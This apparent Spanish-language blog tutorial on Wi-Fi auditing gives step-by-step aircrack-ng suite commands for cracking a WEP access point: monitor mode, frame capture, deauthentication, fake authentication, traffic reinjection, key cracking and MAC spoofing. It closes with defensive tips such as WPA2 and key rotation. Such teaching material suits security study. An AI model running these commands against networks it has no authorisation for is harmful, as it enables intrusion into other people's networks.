Auditoria de Redes - Entendiendo lo que hacemos.
Los lamers son gente que se creen hackers pero hackean mediante programas creados por otras personas. Insultan a los programadores y se creen los mejores por saber utilizar programas hechos por otros. A esta clase de lamer, se le conoce mejor actualmente como "script kiddie".
Requisitos previos:
Hardware --> WNIC --> modo monitor
ANTENA --> aumenta el radio de accion. Mayor sesibilidad. 7dbi
Software --> Airodump-ng desde estaciones GNU-Linux (no podia ser de otro modo).
Airmon-ng
Aireplay-ng
Aircrack-ng
Kismet
Distribucion de GNU-LinuX a utilizar BACKTRACK 4
1. Identificacion y recopilacion de informacion. El ataque se dirige a un AP.
SSID
MAC
CHANNEL
ASOCIADO
Para esto utilizaremos airodump-ng.
Analiza las tramas y captura paquetes.
Para aumentar el trafico en la red se realizan los ataques. Para forzar el trafico. Se envian tramas al AP para provocar reacciones del entorno del AP. Los ataques se realizan con el aireplay. Los mas comunes son:
a) Ataque 0 (cero) Desautenticacion. Provoca la desconexion de uno o todos los clientes. Los clientes intentaran conectarse nuevamente al hacerlo enviaran informacion que sera capturada con el airodump-ng.
b) Ataque 1 (uno) Autenticacion falsa.
c) Ataque 3 (tres) reinyeccion de trafico. Aumentar velocidad del trafico. Forzar al cliente y al AP a que comuniquen mas cosas.
d) Buscar la clave con el aircrack-ng
e) Asociarse utilizando la clave encontrada.
f) IP valida. DHCP o en su defecto IP fija dentro del rango de la red de los demas ordenadores.
g) Puerta de enlace y DNS.
h) Ataque al Router.
Obstaculos:
1. ISSD oculta. jack tools (detecta el SSID). ESSID - jack
2. Filtrado de MAC. Spoofing --> macchanger cambia el numero de MAC. Suplanta la identidad de otro.
Consejos de seguridad. Desde la capa uno hasta la 3.
1. Limitar la señal. Bajar la potencia de emision para que tengan menos alcance. Full signal --> bajar la potencia de señal. Cuanto menos potencia para cubrir el area que necesito mejor.
2. Filtrado MAC.
3. Oculto SSID.
4. Autenticado --> PSK, Shared Key (WEP), Radius.
5. WPA2.
6. Cambio periodico de claves.
7. Desactivar DHCP.
8. Cambiar valores por defecto.
9. Monitorizar AP.
Hay programas recopiladores de WEP. Desde el punto de vista de empresas el acceso desde CD-ROM, USB, se desabilita.
Para cambiar a modo monitor la tarjeta Wireless puede utilizarse
root@syslinux~# iwconfig wlan1 mode monitor
para pasar a modo managed
root@syslinux~# iwconfig wlan1 mode managed.
Para hacer un enlace o apuntando al AP. La tarjeta tendra el registro de ese AP
root@syslinux~# iwconfig wlan1 mode monitor channel 6 (del AP al que quiero asociarme) essid nombre_ap
Capturar las tramas
root@syslinux~# airodump-ng wlan1 -w archivo -c (o --channel) 6.
abrir otra consola.
Inyectar trafico, (Solo tiene sentido si esta asociado a un cliente.)
root@syslinux~# aireplay-ng -3 wlan1 -b mac_objetivo -h mac_mi_wnic.
si no hay nadie conectado asocie su dispositivo wireless.
aireplay-ng -1 30 (intentos de conexion) wlan1 -e ssid -a mac_objetivo -h mac_dispositivo_miwnic
respondera asociation succesful !
abrir otra terminal
aireplay-ng -3 wlan1 -b mac_objetivo -h mac_dispositivo -x (paquetes/segundo) 300
abrir otra consola. Encontrando la clave WEP.
aircrack-ng *.cap
No hay comentarios:
Publicar un comentario